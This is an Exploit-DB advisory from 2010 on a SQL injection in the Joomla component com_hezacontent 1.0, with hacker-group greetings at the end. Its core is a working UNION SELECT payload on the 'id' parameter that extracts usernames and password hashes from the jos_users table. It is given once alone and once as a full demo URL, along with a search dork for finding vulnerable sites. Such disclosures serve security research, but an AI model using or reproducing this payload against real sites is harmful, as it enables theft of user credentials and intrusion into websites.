Joomla! Component com_hezacontent 1.0 - 'id' SQL Injection

EDB-ID:

11667

CVE:

N/A

Author:

kaMtiEz

Type:

webapps

Platform:

PHP

Published:

2010-03-09

[!]===========================================================================[!]

[~] Joomla Component com_hezacontent SQL injection Vulnerability (id)
[~] Author	: kaMtiEz (kamzcrew@yahoo.com)
[~] Homepage	: http://www.indonesiancoder.com
[~] Date	: 9 march, 2010

[!]===========================================================================[!]

[ Software Information ]

[+] Vendor : http://joomlacode.org/
[+] Price : free
[+] Vulnerability : SQL
[+] Dork : inurl:"CIHUY" ;)
[+] Download : http://joomlacode.org/gf/download/frsrelease/11313/46163/com_hezacontent.zip
[+] Version : 1.0 

[!]===========================================================================[!]

[ Vulnerable File ]

http://127.0.0.1/index.php?option=com_hezacontent&view=item&id=[INDONESIANCODER]

[ XpL ]

-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

[ d3m0 ]

http://site.org/index.php?option=com_hezacontent&view=item&id=-1+union+all+select+1,2,3,4,5,6,concat_ws(0x3a,username,password),8,9,10,11,12,13,14,15,16,17,18+from+jos_users--

dan lain sebagainya ;]

[!]===========================================================================[!]

[ Thx TO ]

[+] INDONESIAN CODER TEAM KILL-9 CREW KIRIK CREW MainHack ServerIsDown SurabayaHackerLink IndonesianHacker SoldierOfAllah
[+] tukulesto,M3NW5,arianom,tiw0L,abah_benu,d0ntcry,newbie_043,bobyhikaru,gonzhack
[+] Contrex,onthel,yasea,bugs,Pathloader,cimpli,MarahMerah,senot,all INDONESIANCODER MEMBERS
[+] Coracore,Gh4mb4s,Jack-,VycOd,m0rgue-
[+] #becak - #indonesiancoder - #kill-9 
[ NOTE ] 

[+] Rawk !
[+] gonzhack : buruan kesini dodolllllllllllllllllll !!

[ QUOTE ]

[+] we are not dead INDONESIANCODER stil r0x
[+] nothing secure ..
[+] ./e0f